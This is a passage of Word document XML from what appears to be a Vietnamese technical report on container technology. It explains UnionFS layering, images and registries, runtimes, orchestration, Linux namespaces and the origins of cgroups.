        <w:t xml:space="preserve">Container vận hành dựa trên cơ chế hệ thống tệp phân lớp (Union File System), cho phép xếp chồng và tích hợp nhiều lớp dữ liệu. Đặc tính này cho phép hệ thống thêm hoặc sửa đổi các thành phần phần mềm ở lớp trên cùng (writable layer) mà hoàn toàn không ảnh hưởng đến các lớp tĩnh ở dưới </w:t>
      </w:r>
      <w:r w:rsidR="009D772B" w:rsidRPr="009823E1">
        <w:lastRenderedPageBreak/>
        <w:t>(read-only layers). Cơ chế này tạo điều kiện cho việc tái sử dụng các lớp tài nguyên chung, giúp tiết kiệm dung lượng lưu trữ đĩa và tăng tốc độ khởi tạo dịch vụ.</w:t>
      </w:r>
      <w:r w:rsidR="00E45A5B" w:rsidRPr="00E45A5B">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F51078" w:rsidRPr="00F51078">
        <w:t>Hệ thống tệp liên hợp (Union File System - UnionFS) vận hành trên lớp trừu tượng phía trên các hệ thống tệp truyền thống khác. Cơ chế này thiết lập một góc nhìn logic đồng nhất và duy nhất đối với các tệp tin cũng như thư mục vốn thuộc về các hệ thống tệp biệt lập. Nói cách khác, UnionFS thực hiện gắn kết đồng thời nhiều thư mục khác nhau vào một thư mục gốc duy nhất. Do đó, về bản chất kỹ thuật, giải pháp này đóng vai trò như một cơ chế gắn kết tài nguyên (mounting mechanism) hơn là một kiến trúc hệ thống tệp độc lập.</w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="836341803"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtContent>
          <w:r w:rsidR="00F51078">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="00F51078" w:rsidRPr="00F51078">
            <w:instrText xml:space="preserve"> CITATION Kno19 \l 1033 </w:instrText>
          </w:r>
          <w:r w:rsidR="00F51078">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00D2786A">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t xml:space="preserve"> [1]</w:t>
          </w:r>
          <w:r w:rsidR="00F51078">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
    </w:p>
    <w:p w14:paraId="6278919B" w14:textId="77777777" w:rsidR="00C05E16" w:rsidRDefault="00E45A5B" w:rsidP="00C05E16">
      <w:pPr>
        <w:keepNext/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="180BA94B" wp14:editId="2ED21E3B">
            <wp:extent cx="3129596" cy="1767385"/>
            <wp:effectExtent l="0" t="0" r="0" b="4445"/>
            <wp:docPr id="265283108" name="Picture 3" descr="Union File Syst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Union File System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6067" cy="1771039"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="44C17C8D" w14:textId="3F882FA5" w:rsidR="00695BEE" w:rsidRPr="005062A7" w:rsidRDefault="00C05E16" w:rsidP="00C05E16">
      <w:pPr>
        <w:pStyle w:val="Title"/>
      </w:pPr>
      <w:bookmarkStart w:id="14" w:name="_Toc236001520"/>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6</w:t>
      </w:r>
      <w:r w:rsidR="00175415">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="005062A7">
        <w:t>. Mô hình kiến trúc phân lớp của UFS</w:t>
      </w:r>
      <w:bookmarkEnd w:id="14"/>
    </w:p>
    <w:p w14:paraId="0B674304" w14:textId="0F858939" w:rsidR="009D772B" w:rsidRPr="00695BEE" w:rsidRDefault="00695BEE" w:rsidP="00695BEE">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">+ </w:t>
      </w:r>
      <w:r w:rsidR="009D772B" w:rsidRPr="00695BEE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Ảnh container và Kho lưu trữ (Container Image &amp; Registry)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1382AD00" w14:textId="77777777" w:rsidR="009D772B" w:rsidRPr="000A54C5" w:rsidRDefault="009D772B" w:rsidP="004908F6">
      <w:pPr>
        <w:ind w:left="360" w:firstLine="0"/>
      </w:pPr>
      <w:r w:rsidRPr="000A54C5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Container Image:</w:t>
      </w:r>
      <w:r w:rsidRPr="000A54C5">
        <w:t xml:space="preserve"> Đóng vai trò là các mẫu định sẵn (blueprints) để tạo lập các ứng dụng container. Image lưu trữ toàn bộ trạng thái hệ thống tệp tĩnh của ứng dụng.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1733837D" w14:textId="77777777" w:rsidR="009D772B" w:rsidRDefault="009D772B" w:rsidP="004908F6">
      <w:pPr>
        <w:ind w:left="360" w:firstLine="0"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009D772B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Container Registry:</w:t>
      </w:r>
      <w:r w:rsidRPr="009D772B">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Là hệ thống quản lý và phân phối tập trung các Container Image (ví dụ: Docker Hub, Harbor). Quy trình luân chuyển dịch vụ được thực hiện thông qua các lệnh nạp, kéo và đẩy tệp (Build, Pull, Run) từ phía máy trạm (Client) đến các Registry cấu hình trên Docker Host.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71D27D49" w14:textId="77777777" w:rsidR="00C05E16" w:rsidRDefault="004908F6" w:rsidP="00C05E16">
      <w:pPr>
        <w:keepNext/>
        <w:ind w:left="360" w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="72E5132B" wp14:editId="7AEA783D">
            <wp:extent cx="3771133" cy="2488618"/>
            <wp:effectExtent l="0" t="0" r="1270" b="6985"/>
            <wp:docPr id="1377328859" name="Picture 5" descr="About Registries, Repositories, Images, and Artifacts - Azure Container  Registry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About Registries, Repositories, Images, and Artifacts - Azure Container  Registry | Microsoft Lear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2025" cy="2495806"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="52F1B72D" w14:textId="589060B7" w:rsidR="004908F6" w:rsidRPr="00C05E16" w:rsidRDefault="00C05E16" w:rsidP="00C05E16">
      <w:pPr>
        <w:pStyle w:val="Title"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="15" w:name="_Toc236001521"/>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7</w:t>
      </w:r>
      <w:r w:rsidR="00175415">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00C05E16">
        <w:t xml:space="preserve">. Mô hình hoạt động của một public </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>registry</w:t>
      </w:r>
      <w:bookmarkEnd w:id="15"/>
    </w:p>
    <w:p w14:paraId="1C0847C9" w14:textId="54316754" w:rsidR="009D772B" w:rsidRPr="005062A7" w:rsidRDefault="004908F6" w:rsidP="004908F6">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C05E16">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">+ </w:t>
      </w:r>
      <w:r w:rsidR="009D772B" w:rsidRPr="00C05E16">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Trình thực thi Container (Container Runtime)</w:t>
      </w:r>
      <w:r w:rsidRPr="00C05E16">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="009D772B" w:rsidRPr="00C05E16">
        <w:t xml:space="preserve">Container Runtime chịu trách nhiệm thực thi và quản lý vòng đời (khởi tạo, vận hành, dừng, hủy) của các container trên hệ thống máy chủ host. </w:t>
      </w:r>
      <w:r w:rsidR="009D772B" w:rsidRPr="005062A7">
        <w:t>Thành phần này cung cấp giao diện lập trình để trừu tượng hóa các tương tác phức tạp với tầng nhân của hệ điều hành cơ bản. Các trình thực thi phổ biến hiện nay được phân chia cấu trúc bao gồm Docker, containerd, rkt và CRI-O.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FCA2004" w14:textId="39C172D7" w:rsidR="009D772B" w:rsidRPr="004908F6" w:rsidRDefault="004908F6" w:rsidP="004908F6">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005062A7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">+ </w:t>
      </w:r>
      <w:r w:rsidR="009D772B" w:rsidRPr="005062A7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Hệ nền tảng điều phối (Orchestration)</w:t>
      </w:r>
      <w:r w:rsidRPr="005062A7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="009D772B" w:rsidRPr="005062A7">
        <w:t xml:space="preserve">Khi triển khai ở môi trường thực tế (Production), các nền tảng điều phối container đóng vai trò tự động hóa quy trình triển khai, mở rộng quy mô và quản lý các cụm ứng dụng trên nhiều máy chủ vật lý. Hệ điều phối cung cấp các tính năng then chốt bao gồm: định tuyến dịch vụ (service discovery), cân bằng tải (load balancing), giám sát tình trạng (health monitoring), tự động mở rộng (auto-scaling) và cập nhật luân phiên (rolling updates) nhằm đảm bảo tính sẵn sàng cao và khả năng chịu lỗi của toàn hệ thống. </w:t>
      </w:r>
      <w:r w:rsidR="009D772B" w:rsidRPr="009D772B">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Các giải pháp orchestration tiêu chuẩn trong công nghiệp bao gồm Kubernetes (K8s), Docker Swarm và Nomad.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A9BA634" w14:textId="77777777" w:rsidR="00C05E16" w:rsidRDefault="004908F6" w:rsidP="00C05E16">
      <w:pPr>
        <w:keepNext/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3E245B22" wp14:editId="6AEE2524">
            <wp:extent cx="4694254" cy="3042453"/>
            <wp:effectExtent l="0" t="0" r="0" b="5715"/>
            <wp:docPr id="1261143888" name="Picture 6" descr="What is Container Orchestration? 7 Benefits and 4 To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What is Container Orchestration? 7 Benefits and 4 Tool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0697" cy="3053110"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="383B3D2E" w14:textId="66D43758" w:rsidR="009D772B" w:rsidRPr="00C05E16" w:rsidRDefault="00C05E16" w:rsidP="00C05E16">
      <w:pPr>
        <w:pStyle w:val="Title"/>
      </w:pPr>
      <w:bookmarkStart w:id="16" w:name="_Toc236001522"/>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8</w:t>
      </w:r>
      <w:r w:rsidR="00175415">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00C05E16">
        <w:t>. Cách hoạt động của các trình điều phối</w:t>
      </w:r>
      <w:bookmarkEnd w:id="16"/>
    </w:p>
    <w:p w14:paraId="53A6CDC6" w14:textId="0630FDF8" w:rsidR="009D772B" w:rsidRPr="009E0111" w:rsidRDefault="009D772B" w:rsidP="009E0111">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="17" w:name="_Toc235976349"/>
      <w:r w:rsidRPr="009E0111">
        <w:t>Các cơ chế cô lập cốt lõi của Linux Kernel trong Container</w:t>
      </w:r>
      <w:bookmarkEnd w:id="17"/>
    </w:p>
    <w:p w14:paraId="41310A62" w14:textId="77777777" w:rsidR="009D772B" w:rsidRPr="009823E1" w:rsidRDefault="009D772B" w:rsidP="004908F6">
      <w:r w:rsidRPr="009823E1">
        <w:t>Để đảm bảo tính độc lập và ngăn chặn các hành vi can thiệp trái phép giữa các container lân cận hoặc can thiệp trực tiếp vào máy chủ vật lý, công nghệ container hóa phụ thuộc vào hai cơ chế cô lập gốc của nhân Linux (Linux Kernel):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FA107EC" w14:textId="066C3E07" w:rsidR="002F52EA" w:rsidRPr="009E0111" w:rsidRDefault="009D772B" w:rsidP="009E0111">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="18" w:name="_Toc235976350"/>
      <w:r w:rsidRPr="009E0111">
        <w:t>Linux Namespaces (Không gian tên)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="18"/>
    </w:p>
    <w:p w14:paraId="6401239A" w14:textId="5410B06C" w:rsidR="009D772B" w:rsidRPr="009823E1" w:rsidRDefault="004908F6" w:rsidP="002F52EA">
      <w:r w:rsidRPr="009823E1">
        <w:t>Không gian tên Linux (Linux namespaces) là một tính năng nền tảng của tầng nhân (kernel), cung cấp cơ chế cô lập tài nguyên bằng cách phân chia các tài nguyên hệ thống của nhân sao cho các tiến trình nhìn nhận chúng như các thực thể biệt lập. Mỗi loại không gian tên thực hiện cô lập một khía cạnh cụ thể của môi trường hệ thống, cho phép các tiến trình bên trong không gian tên đó vận hành độc lập với các tiến trình thuộc các không gian tên khác. Cơ chế cô lập này đóng vai trò quyết định đối với công nghệ container hóa (containerization), vì nó cho phép nhiều container chạy đồng thời trên một máy chủ vật lý duy nhất mà không gây xung đột hay can thiệp lẫn nhau</w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:rPr>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:id w:val="1976260349"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtContent>
          <w:r w:rsidR="00F51078">
            <w:rPr>
              <w:lang w:val="en-US"/>
            </w:rPr>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="00F51078" w:rsidRPr="009823E1">
            <w:instrText xml:space="preserve"> CITATION Sri18 \l 1033 </w:instrText>
          </w:r>
          <w:r w:rsidR="00F51078">
            <w:rPr>
              <w:lang w:val="en-US"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00D2786A" w:rsidRPr="009823E1">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t xml:space="preserve"> [2]</w:t>
          </w:r>
          <w:r w:rsidR="00F51078">
            <w:rPr>
              <w:lang w:val="en-US"/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidRPr="009823E1">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="009D772B" w:rsidRPr="009823E1">
        <w:t>Namespaces chịu trách nhiệm cô lập góc nhìn của một tiến trình hoặc một nhóm tiến trình đối với các tài nguyên dùng chung của hệ thống. Nhân Linux cung cấp các không gian tên cốt lõi:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ABFACE1" w14:textId="3AB9546F" w:rsidR="009D772B" w:rsidRPr="009D772B" w:rsidRDefault="00AB432D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>P</w:t>
      </w:r>
      <w:r w:rsidR="009D772B" w:rsidRPr="009D772B">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>id (Process ID): Cô lập không gian tiến trình. Một tiến trình có thể mang ID là 1 (tiến trình gốc) bên trong container nhưng thực chất chỉ là một tiến trình có ID thông thường trên Host OS.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4657F6B9" w14:textId="6ED50725" w:rsidR="009D772B" w:rsidRPr="009D772B" w:rsidRDefault="00AB432D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>N</w:t>
      </w:r>
      <w:r w:rsidR="009D772B" w:rsidRPr="009D772B">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>et (Network): Cung cấp các giao diện mạng, bảng định tuyến và quản lý cổng kết nối độc lập cho từng container, ngăn chặn việc nghe lén lưu lượng mạng giữa các container nếu không được phân quyền.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37A0FFE2" w14:textId="32EF2C59" w:rsidR="009D772B" w:rsidRPr="009D772B" w:rsidRDefault="00AB432D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>M</w:t>
      </w:r>
      <w:r w:rsidR="009D772B" w:rsidRPr="009D772B">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>nt (Mount): Cô lập cấu trúc sơ đồ gắn kết hệ thống tệp, đảm bảo container chỉ nhìn thấy hệ thống tệp được chỉ định nội bộ mà không truy cập được vào hệ thống tệp của máy chủ vật lý.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3685516D" w14:textId="3BC2E83E" w:rsidR="009D772B" w:rsidRPr="009D772B" w:rsidRDefault="00AB432D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>I</w:t>
      </w:r>
      <w:r w:rsidR="009D772B" w:rsidRPr="009D772B">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>pc (Inter-Process Communication): Cô lập cơ chế giao tiếp giữa các tiến trình, ngăn không cho các tiến trình ở các container khác nhau chia sẻ bộ nhớ hoặc gửi thông điệp trực tiếp cho nhau.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="339191A6" w14:textId="25973468" w:rsidR="009D772B" w:rsidRDefault="00AB432D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>U</w:t>
      </w:r>
      <w:r w:rsidR="009D772B" w:rsidRPr="009D772B">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ser: Ánh xạ các ID người dùng và nhóm người dùng. Cơ chế này cho phép một tài khoản có đặc quyền tối cao (root - UID 0) trong container chỉ có đặc quyền của một tài khoản thông thường (non-root) đối với hệ điều hành máy chủ.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="199F7375" w14:textId="77777777" w:rsidR="00F51078" w:rsidRDefault="00F51078" w:rsidP="00F51078">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r w:rsidRPr="00F51078">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="299D6402" wp14:editId="719FECC2">
            <wp:extent cx="5034559" cy="548704"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:docPr id="120266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65682" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId19"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5137959" cy="559973"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CD87BAD" w14:textId="490725D4" w:rsidR="00F51078" w:rsidRDefault="00F51078" w:rsidP="00F51078">
      <w:pPr>
        <w:pStyle w:val="Title"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="19" w:name="_Toc236001523"/>
      <w:r>
        <w:t xml:space="preserve">Hình </w:t>
      </w:r>
      <w:r w:rsidR="00175415">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00175415">
        <w:instrText xml:space="preserve"> STYLEREF 1 \s </w:instrText>
      </w:r>
      <w:r w:rsidR="00175415">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00835A55">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>1</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9</w:t>
      </w:r>
      <w:r w:rsidR="00175415">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00F51078">
        <w:t>.  Không gian tên net trên thực tế khi chạy Docker con</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>tainer</w:t>
      </w:r>
      <w:bookmarkEnd w:id="19"/>
    </w:p>
    <w:p w14:paraId="4036C6EE" w14:textId="72F9A68A" w:rsidR="002F52EA" w:rsidRPr="00482F63" w:rsidRDefault="002F52EA" w:rsidP="00363DC8">
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">+ </w:t>
      </w:r>
      <w:r w:rsidRPr="002F52EA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Cơ chế cô lập của Không gian tên (Namespace Isolation Mechanism)</w:t>
      </w:r>
      <w:r w:rsidRPr="002F52EA">
        <w:t>: Không gian tên (Namespaces) đạt được khả năng cô lập bằng cách tạo ra các thực thể biệt lập của các tài nguyên nhân hệ điều hành toàn cục</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> - GKR</w:t>
      </w:r>
      <w:r w:rsidRPr="002F52EA">
        <w:t xml:space="preserve">(global kernel resources), các tài nguyên này chỉ hiển thị đối với các tiến trình nằm trong không gian tên đó. Khi một tiến trình được khởi tạo cùng với các cờ không gian tên cụ thể (namespace flags), nhân Linux sẽ chỉ định tiến trình đó vào các không gian tên mới hoặc các không gian tên hiện có tương ứng. Các tiến trình bên trong các không gian </w:t>
      </w:r>
      <w:r w:rsidRPr="002F52EA">
        <w:lastRenderedPageBreak/>
        <w:t>tên này ghi nhận một môi trường hoàn toàn cô lập, bao gồm các cấu trúc cây tiến trình, thiết bị mạng và các điểm gắn kết hệ thống tệp duy nhất.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A4E2143" w14:textId="2F547530" w:rsidR="002F52EA" w:rsidRPr="00482F63" w:rsidRDefault="002F52EA" w:rsidP="002F52EA">
      <w:r w:rsidRPr="00482F63">
        <w:t xml:space="preserve">+ </w:t>
      </w:r>
      <w:r w:rsidRPr="00482F63">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Vòng đời và Quy trình khởi tạo Không gian tên</w:t>
      </w:r>
      <w:r w:rsidRPr="00482F63">
        <w:t xml:space="preserve">: Các không gian tên được khởi tạo và quản lý bởi nhân hệ điều hành thông qua các cuộc gọi hệ bao gồm </w:t>
      </w:r>
      <w:r w:rsidRPr="00482F63">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>clone()</w:t>
      </w:r>
      <w:r w:rsidRPr="00482F63">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00482F63">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>unshare()</w:t>
      </w:r>
      <w:r w:rsidRPr="00482F63">
        <w:t xml:space="preserve">, và </w:t>
      </w:r>
      <w:r w:rsidRPr="00482F63">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>setns()</w:t>
      </w:r>
      <w:r w:rsidRPr="00482F63">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="352BE596" w14:textId="0205FB6A" w:rsidR="002F52EA" w:rsidRPr="00482F63" w:rsidRDefault="002F52EA" w:rsidP="002F52EA">
      <w:r w:rsidRPr="00482F63">
        <w:t>Mỗi không gian tên sẽ tiếp tục duy trì và tồn tại miễn là có ít nhất một tiến trình thuộc về nó; khi không còn tiến trình nào tồn tại bên trong, không gian tên đó sẽ tự động bị nhân hệ điều hành hủy bỏ.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="728D58FB" w14:textId="11BA3868" w:rsidR="009D772B" w:rsidRPr="00482F63" w:rsidRDefault="009D772B" w:rsidP="009E0111">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="20" w:name="_Toc235976351"/>
      <w:r w:rsidRPr="00482F63">
        <w:t>Control Groups (cgroups)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="20"/>
    </w:p>
    <w:p w14:paraId="3A341C29" w14:textId="1CF7A382" w:rsidR="00363DC8" w:rsidRPr="00010541" w:rsidRDefault="00363DC8" w:rsidP="00363DC8">
      <w:r w:rsidRPr="00482F63">
        <w:t>Phân hệ cgroups (Control Groups) là một giải pháp quản lý, hạch toán và theo dõi tài nguyên tầng nhân, cung cấp một khung cấu trúc chung cho việc nhóm các tiến trình hệ thống. Cơ chế này chịu trách nhiệm kiểm soát và điều phối các nguồn tài nguyên phần cứng cốt lõi bao gồm bộ xử lý (CPU), bộ nhớ (RAM), cấu phần mạng (Network) cùng nhiều thành phần phụ trợ khác.</w:t>
      </w:r>
      <w:r w:rsidRPr="00363DC8">
        <w:t xml:space="preserve"> Về mặt lịch sử phát triển, giải pháp công nghệ này được khởi xướng vào năm 2006 bởi các kỹ sư thuộc tập đoàn Google (trong đó đóng vai trò chủ chốt là Paul Menage và Rohit Seth) dưới tên gọi ban đầu là "Process Containers" (Các thùng chứa tiến trình). Ngay sau đó, vào năm 2007, dự án chính thức được đổi tên thành "Control Groups" và được tích hợp (merge) trực tiếp vào phiên bản Linux Kernel 2.6.24 vào năm 2008. Kiến trúc cốt lõi của cgroups được kế thừa và phát triển dựa trên một giải pháp nguồn mở của dự án ảo hóa OpenVZ mang tên "Bean Counters". </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="48892517"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtContent>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidRPr="00482F63">
            <w:instrText xml:space="preserve"> CITATION Ros \l 1033 </w:instrText>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00D2786A" w:rsidRPr="00010541">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>[3]</w:t>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
    </w:p>
    <w:p w14:paraId="339B808F" w14:textId="29C65EEB" w:rsidR="009D772B" w:rsidRPr="00363DC8" w:rsidRDefault="009D772B" w:rsidP="00363DC8">
      <w:r w:rsidRPr="00363DC8">
